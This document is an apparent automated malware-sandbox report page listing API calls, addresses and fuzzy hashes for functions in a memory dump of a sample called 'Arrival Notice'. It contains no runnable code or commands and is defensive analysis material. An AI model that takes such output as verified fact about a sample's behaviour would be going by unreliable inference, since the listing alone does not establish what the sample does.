Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
String ID:
API String ID: 2027346449-0
Opcode ID: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
Opcode Fuzzy Hash: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6

Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1

GetMenu.USER32 ref: 0047A703
GetMenuItemCount.USER32(00000000), ref: 0047A74F
GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
_wcslen.LIBCMT ref: 0047A79E
GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
GetSubMenu.USER32(00000000,?), ref: 0047A7F2
PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
String ID:
API String ID: 3257027151-0
Opcode ID: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
Opcode Fuzzy Hash: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6

Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
Opcode ID: 47de25368645c8da39de2ebe5f09194c4e7002daf3317f4525ddcd5fcdabc4b7
Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
Opcode Fuzzy Hash: 47de25368645c8da39de2ebe5f09194c4e7002daf3317f4525ddcd5fcdabc4b7
Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5

Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0044443B
GetKeyboardState.USER32(?), ref: 00444450
SetKeyboardState.USER32(?), ref: 004444A4
PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68

Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00444633
GetKeyboardState.USER32(?), ref: 00444648
SetKeyboardState.USER32(?), ref: 0044469C
PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69

Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
ImageList_Remove.COMCTL32(?,?), ref: 004553D3
SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
String ID:
API String ID: 2354583917-0
Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54

Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98

Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
EnableWindow.USER32(?,00000000), ref: 00448B5C
EnableWindow.USER32(?,00000001), ref: 00448B72
ShowWindow.USER32(?,00000000), ref: 00448BE8
ShowWindow.USER32(?,00000004), ref: 00448BF4
EnableWindow.USER32(?,00000001), ref: 00448C09

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$Enable$Show$MessageMoveSend
String ID:
API String ID: 896007046-0
Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59

Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
GetFocus.USER32 ref: 00448ACF
EnableWindow.USER32(?,00000000), ref: 00448B5C
EnableWindow.USER32(?,00000001), ref: 00448B72
ShowWindow.USER32(?,00000000), ref: 00448BE8
ShowWindow.USER32(?,00000004), ref: 00448BF4
EnableWindow.USER32(?,00000001), ref: 00448C09

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$Enable$Show$FocusMessageSend
String ID:
API String ID: 3429747543-0
Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59

Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F

KillTimer.USER32(?,?,?,?,?), ref: 004012D3
SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
String ID:
API String ID: 3300667738-0
Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D459
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
__swprintf.LIBCMT ref: 0045D4E9
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D

Strings

%lu, xrefs: 0045D4E3
\VH, xrefs: 0045D49B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu$\VH
API String ID: 3164766367-2432546070
Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94

Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25

Strings

Msctls_Progress32, xrefs: 00450BBA

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend
String ID: Msctls_Progress32
API String ID: 3850602802-3636473452
Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58

Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON

Download Yara Rule

APIs

ImageList_Destroy.COMCTL32(?), ref: 00455539
ImageList_Destroy.COMCTL32(?), ref: 00455547
DestroyWindow.USER32(?), ref: 00455728
DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Destroy$DeleteImageList_ObjectWindow$Icon
String ID:
API String ID: 3985565216-0
Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69

Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0041F707

Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600

_free.LIBCMT ref: 0041F71A

Strings

[B, xrefs: 0041F6FB

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID: [B
API String ID: 1020059152-632041663
Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC

Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 00413DA4
__calloc_crt.LIBCMT ref: 00413DB0
__getptd.LIBCMT ref: 00413DBD
CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
_free.LIBCMT ref: 00413E07
__dosmaperr.LIBCMT ref: 00413E12

Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 155776804-0
Opcode ID: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
Opcode Fuzzy Hash: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC

Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
